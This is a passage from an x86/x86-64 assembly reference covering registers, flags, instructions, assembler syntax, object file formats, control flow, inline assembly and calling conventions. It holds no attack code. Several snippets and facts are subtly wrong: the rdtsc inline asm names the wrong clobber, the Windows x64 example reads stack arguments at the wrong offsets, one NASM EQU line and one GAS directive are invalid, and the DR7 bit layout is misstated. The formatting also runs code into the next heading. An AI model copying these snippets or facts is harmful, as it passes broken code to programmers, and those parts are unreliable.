Bit 13: PCIDE - Process-Context Identifiers
Bit 14: OSXSAVE - OS Supports XSAVE/XRSTOR
Bit 16: SMEP - Supervisor Mode Execution Protection
Bit 17: SMAP - Supervisor Mode Access Prevention
CR8: Task Priority Register (for interrupt masking)
EFER (Extended Feature Enable Register, MSR)
Bit 0: SCE - System Call Extensions (SYSCALL/SYSRET)
Bit 8: LME - Long Mode Enable
Bit 10: LMA - Long Mode Active
Bit 11: NXE - No-Execute Enable
DR0-DR7 support hardware breakpoints.
DR0-DR3: Linear breakpoint addresses
DR6: Debug status (which breakpoint triggered)
Bit 0: B0 - Breakpoint 0 condition
Bit 1: B1 - Breakpoint 1 condition
Bit 2: B2 - Breakpoint 2 condition
Bit 3: B3 - Breakpoint 3 condition
Bit 13: BD - Debug register access detected
Bit 14: BS - Single step
Bit 15: BT - Task switch
DR7: Debug control
Bits 0-1: L0,G0 - Local/Global enable for breakpoint 0
Bits 2-3: L1,G1 - Breakpoint 1
Bits 4-5: L2,G2 - Breakpoint 2
Bits 6-7: L3,G3 - Breakpoint 3
Bits 8-11: LE,GE - Exact breakpoint (deprecated)
Bits 16-31: R/W0-3, LEN0-3 (type and length for each breakpoint)
Breakpoint Types (R/W field):
- 00: Instruction execution
- 01: Data writes
- 10: I/O reads/writes (requires CR4.DE)
- 11: Data reads/writes
Breakpoint Length (LEN field):
- 00: 1 byte
- 01: 2 bytes
- 10: 8 bytes (or reserved)
- 11: 4 bytes
The flags register stores status and control bits.
Status Flags (updated by arithmetic)
Bit 0: CF - Carry Flag (unsigned overflow)
Bit 2: PF - Parity Flag (even parity of low byte)
Bit 4: AF - Auxiliary Carry (BCD operations)
Bit 6: ZF - Zero Flag (result zero)
Bit 7: SF - Sign Flag (negative result)
Bit 11: OF - Overflow Flag (signed overflow)
Control Flags
Bit 8: TF - Trap Flag (single-step for debugging)
Bit 9: IF - Interrupt Enable Flag
Bit 10: DF - Direction Flag (0=up, 1=down for string ops)
Bit 12-13: IOPL - I/O Privilege Level
Bit 14: NT - Nested Task
System Flags
Bit 16: RF - Resume Flag (debugging)
Bit 17: VM - Virtual-8086 Mode
Bit 18: AC - Alignment Check
Bit 19: VIF - Virtual Interrupt Flag
Bit 20: VIP - Virtual Interrupt Pending
Bit 21: ID - ID Flag (CPUID support)
Common Flag Operations
; Clear carry
clc
; Set carry
stc
; Complement carry
cmc
; Clear direction (string ops increment)
cld
; Set direction (string ops decrement)
std
; Clear interrupt flag
cli
; Set interrupt flag
sti
; Push flags onto stack
pushfq
; Pop flags from stack
popfq
; Load flags into AH (for 16-bit)
lahf
; Store AH into flags
sahfThe stack is a Last-In-First-Out (LIFO) data structure.
Stack Operations
; Push: decrement RSP, store value
push rax ; RSP -= 8, [RSP] = RAX
; Pop: load value, increment RSP
pop rax ; RAX = [RSP], RSP += 8
; Call: push return address, jump
call func ; push RIP (next instruction), jmp func
; Return: pop return address, jump
ret ; pop RIP, jmpStack Frame Layout
Typical function prologue:
push rbp ; save caller's frame pointer
mov rbp, rsp ; set our frame pointer
sub rsp, 32 ; allocate local variablesStack layout:
High addresses
+-----------------+
| Caller's frame |
+-----------------+ <--- RBP+16 (first arg)
| Return address |
+-----------------+ <--- RBP+8
| Saved RBP |
+-----------------+ <--- RBP
| Local variables |
+-----------------+ <--- RBP-x
| (alignment) |
+-----------------+ <--- RSP
Low addresses
Stack Alignment
x86-64 ABI requires 16-byte stack alignment before call:
- RSP must be multiple of 16
callpushes 8-byte return address (misaligns by 8)- Function prologue re-aligns
x86 provides flexible addressing modes.
Immediate (constant in instruction)
mov rax, 42 ; 42 is immediateRegister (value in register)
mov rax, rbx ; content of RBXDirect (address constant)
mov rax, [0x1234] ; load from absolute addressRegister Indirect
mov rax, [rbx] ; address in RBXBase + Displacement
mov rax, [rbx + 16] ; RBX + 16
mov rax, [array + 8] ; constant + 8Indexed
mov rax, [rbx + rcx*8] ; RBX + RCX*8Base + Index + Displacement
mov rax, [rbx + rcx*4 + 16] ; most complex formRIP-Relative (64-bit only)
mov rax, [rip + offset] ; relative to current instructionAddressing Mode Encodings
MODRM byte structure:
7 6 5 4 3 2 1 0
+-----+-----+-----+
| Mod | Reg | R/M |
+-----+-----+-----+
SIB byte (Scale-Index-Base):
7 6 5 4 3 2 1 0
+-----+-----+-----+
|Scale|Index|Base |
+-----+-----+-----+
Scale: 00=1, 01=2, 10=4, 11=8
MOV (Move)
Most common instruction, copies data between registers/memory.
mov rax, rbx ; register to register
mov rax, [mem] ; memory to register
mov [mem], rax ; register to memory
mov rax, 1234 ; immediate to register
mov [mem], 1234 ; immediate to memory (size must match)Size specifiers (NASM):
mov byte [mem], 12 ; 8-bit
mov word [mem], 1234 ; 16-bit
mov dword [mem], 1234 ; 32-bit
mov qword [mem], 1234 ; 64-bitMOVZX (Move with Zero-Extend)
movzx eax, bl ; zero-extend BL to EAX
movzx rax, bx ; zero-extend BX to RAXMOVSX (Move with Sign-Extend)
movsx eax, bl ; sign-extend BL to EAX
movsx rax, bx ; sign-extend BX to RAX
movsxd rax, ebx ; sign-extend 32-bit to 64-bit (special)XCHG (Exchange)
xchg rax, rbx ; swap RAX and RBX
xchg [mem], rax ; atomic exchange with memoryPUSH/POP (Stack operations)
push rax ; push RAX onto stack
push 1234 ; push immediate
push word 1234 ; push 16-bit immediate
pop rax ; pop into RAX
pop [mem] ; pop into memoryLEA (Load Effective Address)
Computes address but doesn't access memory.
lea rax, [rbx+rcx*4] ; RAX = RBX + RCX*4
lea rax, [array] ; RAX = address of array (RIP-relative)Common trick: LEA for arithmetic:
lea eax, [ebx+ecx] ; EAX = EBX + ECX (without setting flags)
lea eax, [ebx*4+ebx] ; EAX = EBX*5CMOV (Conditional Move)
cmp eax, ebx
cmovg ecx, edx ; if EAX > EBX, ECX = EDXMOVBE (Move with Byte Swap)
movbe eax, [mem] ; load with byte swap (little-endian to big-endian)Addition
add rax, rbx ; RAX = RAX + RBX
add rax, 1234 ; RAX = RAX + 1234
add [mem], rax ; memory += RAX
adc rax, rbx ; add with carry (for multi-precision)Subtraction
sub rax, rbx ; RAX = RAX - RBX
sub rax, 1234 ; RAX = RAX - 1234
sbb rax, rbx ; subtract with borrowMultiplication
mul rbx ; unsigned: RDX:RAX = RAX * RBX
imul rbx ; signed: RDX:RAX = RAX * RBX
imul rax, rbx ; RAX = RAX * RBX
imul rax, rbx, 1234 ; RAX = RBX * 1234Division
div rbx ; unsigned: RAX = RDX:RAX / RBX, RDX = remainder
idiv rbx ; signed: sameIncrement/Decrement
inc rax ; RAX++
dec rax ; RAX--Negation
neg rax ; RAX = -RAX (two's complement)Comparison
cmp rax, rbx ; set flags based on RAX - RBX
test rax, rax ; set flags based on RAX & RAX (check zero)AND
and rax, rbx ; RAX = RAX & RBX
and rax, 0x0F ; mask low 4 bits
and [mem], rax ; memory &= RAXOR
or rax, rbx ; RAX = RAX | RBX
or rax, 0x80 ; set bit 7XOR
xor rax, rbx ; RAX = RAX ^ RBX
xor rax, rax ; zero RAX (most efficient)NOT
not rax ; RAX = ~RAX (one's complement)TEST
test rax, rbx ; set flags based on RAX & RBX (no destination)
test rax, rax ; check if RAX is zero/negativeUnconditional Jumps
jmp label ; jump to label
jmp rax ; jump to address in RAX (register indirect)
jmp [mem] ; jump to address in memoryConditional Jumps
Based on flags:
jz label ; jump if zero (ZF=1)
jnz label ; jump if not zero (ZF=0)
je label ; jump if equal (same as JZ)
jne label ; jump if not equal (same as JNZ)
jg label ; jump if greater (signed) (ZF=0 and SF=OF)
jge label ; jump if greater or equal (signed) (SF=OF)
jl label ; jump if less (signed) (SF≠OF)
jle label ; jump if less or equal (signed) (ZF=1 or SF≠OF)
ja label ; jump if above (unsigned) (CF=0 and ZF=0)
jae label ; jump if above or equal (unsigned) (CF=0)
jb label ; jump if below (unsigned) (CF=1)
jbe label ; jump if below or equal (unsigned) (CF=1 or ZF=1)
jc label ; jump if carry (CF=1)
jnc label ; jump if not carry (CF=0)
jo label ; jump if overflow (OF=1)
jno label ; jump if not overflow (OF=0)
js label ; jump if sign (SF=1)
jns label ; jump if not sign (SF=0)
jp label ; jump if parity (PF=1)
jnp label ; jump if not parity (PF=0)Loop Instructions
loop label ; decrement RCX, jump if RCX != 0
loope label ; loop while ZF=1 and RCX != 0
loopne label ; loop while ZF=0 and RCX != 0Call and Return
call func ; push return address, jump to func
ret ; pop return address, jump
ret 16 ; pop return address, add 16 to RSPInterrupts
int 0x80 ; software interrupt (legacy Linux syscall)
int3 ; breakpoint interrupt
into ; interrupt on overflow
iret ; return from interruptString instructions operate on memory with automatic pointer updates.
MOVS (Move String)
movsb ; move byte from [RSI] to [RDI], update pointers
movsw ; move word
movsd ; move dword
movsq ; move qword (64-bit)
; Repeat prefix for blocks
rep movsb ; repeat RCX timesCMPS (Compare String)
cmpsb ; compare byte at [RSI] with [RDI]
rep cmpsb ; compare until difference found
repe cmpsb ; compare while equal
repne cmpsb ; compare while not equalSCAS (Scan String)
scasb ; compare AL with [RDI]
scasw ; compare AX with [RDI]
scasd ; compare EAX with [RDI]
scasq ; compare RAX with [RDI]
repne scasb ; scan for ALSTOS (Store String)
stosb ; store AL to [RDI]
stosw ; store AX to [RDI]
stosd ; store EAX to [RDI]
stosq ; store RAX to [RDI]
rep stosb ; fill memory with ALLODS (Load String)
lodsb ; load from [RSI] to AL
lodsw ; load to AX
lodsd ; load to EAX
lodsq ; load to RAXShift Instructions
shl rax, 1 ; shift left, fill with 0
shr rax, 1 ; shift right, fill with 0
sal rax, 1 ; shift arithmetic left (same as SHL)
sar rax, 1 ; shift arithmetic right (preserve sign)
; Variable shifts
shl rax, cl ; shift by CLRotate Instructions
rol rax, 1 ; rotate left
ror rax, 1 ; rotate right
rcl rax, 1 ; rotate through carry left
rcr rax, 1 ; rotate through carry rightBit Test Instructions
bt rax, 5 ; test bit 5, copy to CF
bts rax, 5 ; test and set
btr rax, 5 ; test and reset
btc rax, 5 ; test and complement
; Memory forms
bt [mem], 5 ; test bit in memoryBit Scan
bsf rax, rbx ; bit scan forward (find first 1)
bsr rax, rbx ; bit scan reverse (find last 1)
tzcnt rax, rbx ; trailing zero count (BMI1)
lzcnt rax, rbx ; leading zero count (BMI1)
popcnt rax, rbx ; population count (NEhalem+)Privileged Instructions
lgdt [mem] ; load GDT
sgdt [mem] ; store GDT
lidt [mem] ; load IDT
sidt [mem] ; store IDT
lldt ax ; load LDT
sldt rax ; store LDT
ltr ax ; load task register
str rax ; store task register
mov cr0, rax ; move to control register
mov rax, cr3 ; move from control register
mov dr0, rax ; move to debug register
invlpg [mem] ; invalidate TLB entry
wbinvd ; write back and invalidate cacheSystem Call Instructions
syscall ; fast system call (64-bit)
sysret ; return from syscall
sysenter ; fast system call (32-bit)
sysexit ; return from sysenter
int 0x80 ; legacy interrupt-based syscallHalt and Wait
hlt ; halt processor until interrupt
pause ; spin loop hint (improves power/performance)SIMD instructions process multiple data elements in one instruction.
SSE Registers
- XMM0-XMM15: 128-bit (16 bytes)
- Support for integer and floating-point operations
SSE Data Types
; Packed types
__m128 ; 4 floats
__m128d ; 2 doubles
__m128i ; integer (16 bytes)
; Scalar types
__m128 ; single float (high 96 bits ignored)Basic SSE Instructions
; Move
movaps xmm0, xmm1 ; move aligned packed single
movups xmm0, [mem] ; move unaligned packed single
movss xmm0, [mem] ; move scalar single
; Arithmetic
addps xmm0, xmm1 ; add packed single
addss xmm0, xmm1 ; add scalar single
subps, mulps, divps, sqrtps, etc.
; Logical
andps xmm0, xmm1 ; bitwise AND
orps, xorps
; Compare
cmpps xmm0, xmm1, 0 ; compare equal (packed)
cmpps xmm0, xmm1, 1 ; compare less
cmpps xmm0, xmm1, 2 ; compare less or equalAVX (Advanced Vector Extensions)
256-bit YMM registers:
vmovaps ymm0, ymm1 ; move 8 floats
vaddps ymm0, ymm1, ymm2 ; add 8 floats (3-operand)AVX-512
512-bit ZMM registers with masking:
; Masked operation
vpaddd zmm0 {k1}, zmm1, zmm2 ; add with mask k1Legacy x87 FPU (rarely used now, but still present).
FPU Register Stack
8 registers (ST0-ST7) as a stack:
- ST(0) is top
- Values are 80-bit extended precision
FPU Instructions
; Data transfer
fld [mem] ; load float to ST0
fst [mem] ; store ST0 to memory
fstp [mem] ; store and pop
; Arithmetic
fadd st0, st1 ; ST0 = ST0 + ST1
fsub, fmul, fdiv
; Compare
fcom st1 ; compare ST0 with ST1
fcomp ; compare and pop
fcompp ; compare and pop twice
; Constants
fldz ; load 0.0
fld1 ; load 1.0
fldpi ; load π
; Transcendental
fsin, fcos, fpatan ; sine, cosine, arctan
fyl2x ; y * log2(x)Two main syntax families for x86 assembly.
Intel Syntax (NASM, MASM, FASM)
; Instruction destination, source
mov eax, ebx ; copy EBX to EAX
mov eax, [ebx+4] ; load from memory
mov dword [eax], 10 ; store immediate to memory
jmp label ; jump to labelAT&T Syntax (GAS)
; Instruction source, destination (opposite order)
movl %ebx, %eax ; copy EBX to EAX
movl 4(%ebx), %eax ; load from memory
movl $10, (%eax) ; store immediate to memory
jmp label ; jump to labelKey Differences
| Feature | Intel | AT&T |
|---|---|---|
| Order | dest, src | src, dest |
| Register | eax | %eax |
| Immediate | 123 | $123 |
| Memory | [ebx+4] | 4(%ebx) |
| Size | dword ptr | l (long) |
| Address | [eax+ebx*4] | (%eax,%ebx,4) |
Size Mnemonics (AT&T)
- b = byte (8-bit)
- w = word (16-bit)
- l = long (32-bit)
- q = quad (64-bit)
- t = ten bytes (80-bit)
Assembler directives control the assembly process.
NASM Directives
; Section directives
section .text ; code section
section .data ; initialized data
section .bss ; uninitialized data
; Data definition
db 0x55 ; define byte
dw 0x1234 ; define word
dd 0x12345678 ; define dword
dq 0x123456789ABCDEF0 ; define qword
dt 1.234 ; define 80-bit float
; Multiple values
db 1, 2, 3, 4 ; sequence of bytes
times 100 db 0 ; repeat 100 times
; Strings
db 'Hello', 0 ; C-style string
db "Hello", 10 ; with newline
; Equates
EQU value 100 ; constant
%define macro(x) x+1 ; macro
; Alignment
align 16 ; align to 16-byte boundary
alignb 16 ; align in BSS (no data emitted)
; Symbols
global _start ; export symbol
extern printf ; import symbolMASM Directives
.MODEL flat, C ; memory model
.STACK 4096 ; stack size
.DATA
var1 DB 10 ; byte variable
var2 DW 1234h ; word variable
array DD 10 DUP(0) ; 10 dwords initialized to 0
msg DB "Hello", 0 ; string
.CODE
main PROC
mov eax, 0
ret
main ENDP
END mainExecutable files are organized into sections.
.text Section
Contains executable code:
- Read-only (usually)
- Shared among processes
- Contains instructions and constants
section .text
global _start
_start:
mov eax, 1 ; syscall number
mov ebx, 0 ; exit code
int 0x80 ; kernel call.data Section
Initialized data:
- Read-write
- Values defined at compile time
- Takes space in executable
section .data
message db 'Hello, World!', 10, 0
len equ $ - message ; length calculation
array dd 1, 2, 3, 4, 5
count dd 5
pi dq 3.141592653589793.bss Section
Uninitialized data:
- Read-write
- Takes no space in executable
- Zero-filled at program start
section .bss
buffer resb 4096 ; reserve 4096 bytes
temp resd 1 ; reserve one dword
array resq 100 ; reserve 100 qwordsLabels represent addresses in the code or data.
Local Labels
loop_start:
dec ecx
jnz loop_start
; Local labels starting with .
func:
.loop: ; local to func
dec ecx
jnz .loop
retSpecial Symbols
$ ; current address
$$ ; start of current section
section .data
msg db 'Hello', 0
.len equ $ - msg ; length of stringGood comments are essential in assembly.
Comment Styles
; Single line comment (NASM, GAS)
; Multi-line comment
; can continue
; on multiple lines
%if 0 ; NASM block comment
This is commented out
%endif
/*
* C-style comment (GAS, MASM)
* Can span multiple lines
*/Documentation Standards
; Function: strcpy - copy string
; Arguments:
; RDI - destination buffer
; RSI - source string
; Returns:
; RAX - destination (like C strcpy)
; Clobbers:
; RCX, RFLAGS
; Notes:
; Assumes buffers are large enough
; Copies until null terminator
strcpy:
push rbp
mov rbp, rsp
; Save registers we'll use
push rcx
push rsi
push rdi
; Main copy loop
xor rcx, rcx ; counter
.copy_loop:
mov al, [rsi + rcx] ; get source byte
mov [rdi + rcx], al ; store to destination
inc rcx
test al, al ; check for null
jnz .copy_loop
; Restore and return
pop rdi
pop rsi
pop rcx
pop rbp
retNASM is the most popular assembler for x86 on Unix-like systems.
Basic Usage
# Assemble to object file
nasm -f elf64 program.asm -o program.o
# Assemble with debug info
nasm -f elf64 -g program.asm -o program.o
# Generate listing file
nasm -f elf64 -l program.lst program.asm
# Preprocess only
nasm -E program.asm
# Link with ld
ld program.o -o program
# Link with glibc
gcc -no-pie program.o -o programNASM Example
; hello.asm - Hello World program
section .data
msg db 'Hello, World!', 10, 0
len equ $ - msg
section .text
global _start
_start:
; Write syscall
mov rax, 1 ; sys_write
mov rdi, 1 ; stdout
mov rsi, msg ; buffer
mov rdx, len ; length
syscall
; Exit syscall
mov rax, 60 ; sys_exit
xor rdi, rdi ; status 0
syscallNASM Features
- Macro preprocessor
- Conditional assembly
- Structure definitions
- Local labels
- Expression evaluation
MASM is the traditional assembler for Windows.
MASM Example
; hello.asm - Hello World for Windows
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
.data
msg db "Hello, World!", 13, 10, 0
len equ $ - msg
.code
start:
invoke StdOut, addr msg
invoke ExitProcess, 0
end startMASM Features
- High-level-like syntax (INVOKE)
- Structure definitions
- Record types
- Simplified segment directives
GAS is the default assembler on Linux/Unix systems.
GAS Example
# hello.s - Hello World in GAS syntax
.section .data
msg:
.ascii "Hello, World!\n"
len = . - msg
.section .text
.globl _start
_start:
# write syscall
movl $4, %eax # sys_write
movl $1, %ebx # stdout
movl $msg, %ecx # buffer
movl $len, %edx # length
int $0x80
# exit syscall
movl $1, %eax # sys_exit
movl $0, %ebx # status
int $0x80GAS with Intel Syntax
.syntax noprefix
.intel_syntax noprefix
.section .data
msg: .ascii "Hello, World!\n"
len = . - msg
.section .text
.globl _start
_start:
mov eax, 4
mov ebx, 1
mov ecx, offset msg
mov edx, len
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80FASM is a lightweight, high-performance assembler.
FASM Example
; hello.asm - Hello World in FASM
format ELF64 executable
segment readable executable
entry _start
_start:
mov eax, 1 ; sys_write
mov edi, 1 ; stdout
mov esi, msg ; buffer
mov edx, len ; length
syscall
mov eax, 60 ; sys_exit
xor edi, edi ; status
syscall
segment readable writeable
msg db 'Hello, World!', 10
len = $ - msgFASM Features
- Self-compiling (written in assembly)
- Very fast
- Multiple output formats
- Powerful macro system
The GNU linker (ld) combines object files into executables.
Basic LD Usage
# Link single object
ld program.o -o program
# Link with libraries
ld -lc program.o -o program -dynamic-linker /lib64/ld-linux-x86-64.so.2
# Link with custom layout
ld -T script.ld program.o -o programLinker Script Example
/* simple.ld - Simple linker script */
OUTPUT_FORMAT(elf64-x86-64)
ENTRY(_start)
SECTIONS
{
. = 0x400000; /* Starting address */
.text : {
*(.text)
*(.text.*)
}
.data : {
*(.data)
*(.data.*)
}
.bss : {
*(.bss)
*(.bss.*)
}
/DISCARD/ : {
*(.comment)
*(.note.*)
}
}ELF (Executable and Linkable Format)
Standard format on Linux/Unix:
ELF Header
- Magic number (7F 45 4C 46)
- Architecture (x86-64)
- Entry point
- Program header offset
- Section header offset
Program Header Table
- Segment definitions (LOAD, INTERP, DYNAMIC)
- Virtual addresses
- Permissions (R, W, E)
Section Header Table
- Section definitions (.text, .data, .bss)
- Section sizes and offsets
Sections
- Actual code and data
- Symbol tables
- Debug information
PE (Portable Executable)
Windows format:
DOS Header (MZ)
DOS Stub
PE Header
- Signature (PE\0\0)
- COFF header
- Optional header
Section Table
- .text (code)
- .data (initialized data)
- .rdata (read-only data)
- .bss (uninitialized)
- .idata (imports)
- .edata (exports)
- .reloc (relocations)
Sections
- Actual code/data
- Import/export tables
- Resources
Mach-O
macOS format:
Header
- Magic number
- CPU type
- File type
Load Commands
- Segment definitions
- Dynamic linking info
- Thread state
Segments
- __TEXT (code)
- __DATA (data)
- __LINKEDIT (linker info)
Implementing if-then-else structures.
Simple If
if (x > 10) {
y = 1;
} cmp dword [x], 10
jle .skip ; jump if not > 10
mov dword [y], 1
.skip:If-Else
if (x > 10) {
y = 1;
} else {
y = 2;
} cmp dword [x], 10
jle .else
mov dword [y], 1
jmp .endif
.else:
mov dword [y], 2
.endif:Complex Conditions
if (x > 10 && y < 20) {
z = 1;
} cmp dword [x], 10
jle .false ; first condition false
cmp dword [y], 20
jge .false ; second condition false
mov dword [z], 1
jmp .endif
.false:
; do nothing or else part
.endif:While Loop
while (i < 10) {
a[i] = 0;
i++;
} xor ecx, ecx ; i = 0
.while:
cmp ecx, 10
jge .end_while
mov dword [array + ecx*4], 0
inc ecx
jmp .while
.end_while:Do-While Loop
do {
a[i] = 0;
i++;
} while (i < 10); xor ecx, ecx
.do:
mov dword [array + ecx*4], 0
inc ecx
cmp ecx, 10
jl .doFor Loop
for (i = 0; i < 10; i++) {
a[i] = i;
} xor ecx, ecx
.for:
cmp ecx, 10
jge .end_for
mov [array + ecx*4], ecx
inc ecx
jmp .for
.end_for:Using LOOP Instruction
mov ecx, 10
xor eax, eax
.loop:
add eax, ecx
loop .loop ; dec ecx, jump if not zeroJump Table Method
switch (x) {
case 0: y = 10; break;
case 1: y = 20; break;
case 2: y = 30; break;
default: y = 0;
} cmp eax, 2
ja .default ; if > 2, default
jmp [jump_table + eax*8] ; jump via table
jump_table:
dq .case0
dq .case1
dq .case2
.case0:
mov ebx, 10
jmp .end_switch
.case1:
mov ebx, 20
jmp .end_switch
.case2:
mov ebx, 30
jmp .end_switch
.default:
xor ebx, ebx
.end_switch:Comparison Chain
For sparse or non-consecutive cases:
cmp eax, 10
je .case10
cmp eax, 20
je .case20
cmp eax, 30
je .case30
jmp .defaultJump tables enable efficient multi-way branching.
Computed GOTO
; Jump to address in RAX
jmp rax
; Jump to address from memory
jmp [jump_table + rbx*8]
; Indirect call
call [function_table + rcx*8]Example: State Machine
state_machine:
; RBX = current state
jmp [state_table + rbx*8]
state_table:
dq state_idle
dq state_active
dq state_error
dq state_done
state_idle:
; handle idle state
; set next state
jmp state_machine
state_active:
; handle active state
jmp state_machine
state_error:
; handle error
jmp state_machine
state_done:
; finished
retGCC Extended ASM
int add(int a, int b) {
int result;
__asm__ volatile (
"addl %%ebx, %%eax"
: "=a" (result)
: "a" (a), "b" (b)
: "cc"
);
return result;
}Syntax Breakdown:
__asm__ [volatile] (
"instructions\n\t"
: output operands (optional)
: input operands (optional)
: clobbered registers (optional)
);
Constraints:
- "a" = use EAX
- "b" = use EBX
- "c" = use ECX
- "d" = use EDX
- "r" = any register
- "m" = memory operand
- "i" = immediate
Example: CPUID
void cpuid(int code, int *a, int *b, int *c, int *d) {
__asm__ volatile (
"cpuid"
: "=a" (*a), "=b" (*b), "=c" (*c), "=d" (*d)
: "a" (code)
: "cc"
);
}Example: RDTSC
uint64_t rdtsc() {
uint32_t lo, hi;
__asm__ volatile (
"rdtsc"
: "=a" (lo), "=d" (hi)
:
: "ecx" // rdtsc clobbers EDX:EAX only
);
return ((uint64_t)hi << 32) | lo;
}MSVC Inline Assembly
int add(int a, int b) {
__asm {
mov eax, a
add eax, b
; result in eax
}
// Value in EAX is returned
}MSVC Limitations:
- x64 doesn't support inline assembly
- Must use separate .asm files for x64
Calling conventions define how functions receive parameters and return values.
System V AMD64 ABI (Linux, macOS, BSD)
Used on Unix-like systems for x86-64:
Integer/pointer arguments:
RDI, RSI, RDX, RCX, R8, R9 (in order)
Floating-point arguments:
XMM0-XMM7
Additional arguments: stack (right-to-left)
Return values:
RAX (integer/pointer)
RDX:RAX (128-bit)
XMM0/XMM0:XMM1 (float)
Registers:
Callee-saved: RBX, RBP, R12-R15
Caller-saved: all others
RAX, RCX, RDX, RSI, RDI, R8-R11 are scratch
Stack alignment: 16-byte before CALL
Example:
int func(int a, int b, int c, int d, int e, int f, int g) {
return a + b + c + d + e + f + g;
}; a=RDI, b=RSI, c=RDX, d=RCX, e=R8, f=R9, g=[RSP+8]
func:
push rbp
mov rbp, rsp
add rdi, rsi ; a+b
add rdi, rdx ; +c
add rdi, rcx ; +d
add rdi, r8 ; +e
add rdi, r9 ; +f
add rdi, [rbp+16] ; +g (skip saved RBP + return address)
mov rax, rdi ; return value
pop rbp
retMicrosoft x64 Calling Convention (Windows)
Arguments:
RCX, RDX, R8, R9 (first four)
Stack (right-to-left) for additional
Return values:
RAX (integer/pointer)
XMM0 (float)
Registers:
Callee-saved: RBX, RBP, RDI, RSI, R12-R15, XMM6-XMM15
Caller-saved: all others
Shadow space: Caller reserves 32 bytes on stack
Stack alignment: 16-byte before CALL
func:
; RCX = a, RDX = b, R8 = c, R9 = d
; [RSP+32] = e, [RSP+40] = f, [RSP+48] = g
push rbp
mov rbp, rsp
add rcx, rdx ; a+b
add rcx, r8 ; +c
add rcx, r9 ; +d
add rcx, [rbp+40] ; +e (shadow space + saved RBP)
add rcx, [rbp+48] ; +f
add rcx, [rbp+56] ; +g
mov rax, rcx
pop rbp
retcdecl (32-bit)
Classic 32-bit calling convention:
Arguments: stack (right-to-left)
Return: EAX
Caller cleans stack
push dword 3
push dword 2
push dword 1
call func
add esp, 12 ; caller cleans upstdcall (32-bit Windows)
Like cdecl but callee cleans stack:
func proc
push ebp
mov ebp, esp
mov eax, [ebp+8] ; first arg
; ...
pop ebp
ret 12 ; return and clean 12 bytes
func endpfastcall (32-bit)
First two/three arguments in registers:
- ECX, EDX (Microsoft)
- EAX, EDX, ECX (Borland)
Prologue
push rbp ; save caller's frame pointer
mov rbp, rsp ; set our frame pointer
sub rsp, 32 ; allocate local variablesEpilogue
mov rsp, rbp ; restore stack pointer
pop rbp ; restore frame pointer
ret ; returnFrame Pointer Optimization
Compiler can omit frame pointer (-fomit-frame-pointer):
func:
sub rsp, 40 ; allocate locals + alignment
; use RSP+offset for locals
mov eax, [rsp+32] ; local variable
add rsp, 40
retAccessing Stack Arguments
32-bit (cdecl):
push ebp
mov ebp, esp
mov eax, [ebp+8] ; first argument
mov ebx, [ebp+12] ; second argument
; ...
mov esp, ebp
pop ebp
ret64-bit (System V):
; First 6 args in registers
; 7th+ on stack at [RSP+8], [RSP+16], etc.
func:
push rbp
mov rbp, rsp
; RDI, RSI, RDX, RCX, R8, R9 are args
mov rax, [rbp+16] ; 7th arg (skip return address + saved RBP)
pop rbp
retVariable Arguments (varargs)
int sum(int count, ...) {
int total = 0;
va_list args;
va_start(args, count);
for(int i = 0; i < count; i++)
total += va_arg(args, int);
va_end(args);
return total;
}Assembly must handle variable number of arguments:
; RDI = count
; RSI = first vararg, etc.
sum:
push rbp
mov rbp, rsp
mov rcx, rdi ; count
xor rax, rax ; total
; Process registers
test rcx, rcx
jz .done_regs
add rax, rsi ; add first vararg
dec rcx
jz .done_regs
add rax, rdx
dec rcx
jz .done_regs
add rax, r8
dec rcx
jz .done_regs
add rax, r9
dec rcx
jz .done_regs
; Remaining args on stack
mov rdx, rcx ; count left
lea rsi, [rbp+16] ; first stack arg
.loop_stack:
add rax, [rsi]
add rsi, 8
dec rdx
jnz .loop_stack
.done_regs:
pop rbp
retFactorial Example
int factorial(int n) {
if (n <= 1) return 1;
return n * factorial(n-1);
}; RDI = n
factorial:
push rbp
mov rbp, rsp
cmp edi, 1
jle .base_case
; Save n
push rdi
; factorial(n-1)
dec edi
call factorial
; Multiply by n
pop rdi
imul rax, rdi
jmp .return
.base_case:
mov eax, 1
.return:
pop rbp
retTail Recursion Optimization
When recursive call is the last operation:
int factorial_tail(int n, int acc) {
if (n <= 1) return acc;
return factorial_tail(n-1, acc * n);
}; RDI = n, RSI = acc
factorial_tail:
cmp edi, 1
jle .done
imul rsi, rdi ; acc *= n
dec edi ; n--
; Tail call optimization - just jump
jmp factorial_tail ; no new stack frame
.done:
mov rax, rsi
retTail call optimization reuses the current stack frame.
Before Optimization
int func1(int x) {
return func2(x + 1);
}func1:
push rbp
mov rbp, rsp
inc edi
call func2
pop rbp
retAfter Optimization
func1:
inc edi
jmp func2 ; jump instead of call/retRequirements for TCO:
- Call is last instruction before ret
- No local variables needed after call
- Must preserve stack alignment
Calling printf from Assembly
; hello.asm - Call printf
section .data
format db "Hello, %s!", 10, 0
name db "World", 0
section .text
global main
extern printf
main:
push rbp
mov rbp, rsp
; printf(format, name)
lea rdi, [format]
lea rsi, [name]
xor eax, eax ; 0 floating point args
call printf
; return 0
xor eax, eax
pop rbp
retCalling Assembly from C
// extern int add(int a, int b);
extern int add(int, int);
int main() {
int result = add(5, 3);
printf("%d\n", result);
return 0;
}; add.asm
global add
add:
mov eax, edi
add eax, esi
retAccessing Global Variables
// C code
extern int global_var;
void set_global(int x) {
global_var = x;
}; Assembly
extern global_var
set_global:
mov [global_var], edi
retTypical Linux process memory layout:
High addresses (0x7FFFFFFFFFFFFF)
+--------------------------+
| Stack | (grows downward)
| ↓ |
+--------------------------+
| |
| Memory Mapped |
| Region |
| |
+--------------------------+
| ↑ |
| Heap | (grows upward)
+--------------------------+
| .bss | (uninitialized data)
+--------------------------+
| .data | (initialized data)
+--------------------------+
| .text | (code)
+--------------------------+
| Reserved |
Low addresses (0x400000)
Memory Segments
- .text: Read-only, executable (code)
- .data: Read-write, initialized global/static variables
- .bss: Read-write, zero-initialized global/static
- Heap: Dynamically allocated memory (malloc)
- Stack: Local variables, function call context
- Memory mapped: Shared libraries, mmap files
Viewing Process Memory
# View memory map of process
cat /proc/pid/maps
# Example output:
00400000-00401000 r-xp 00000000 08:01 12345 /bin/program
00600000-00601000 r--p 00000000 08:01 12345 /bin/program
00601000-00602000 rw-p 00001000 08:01 12345 /bin/program
7ffff7a00000-7ffff7bc0000 r-xp 00000000 08:01 libc.so
7ffff7bc0000-7ffff7dc0000 ---p 001c0000 08:01 libc.so
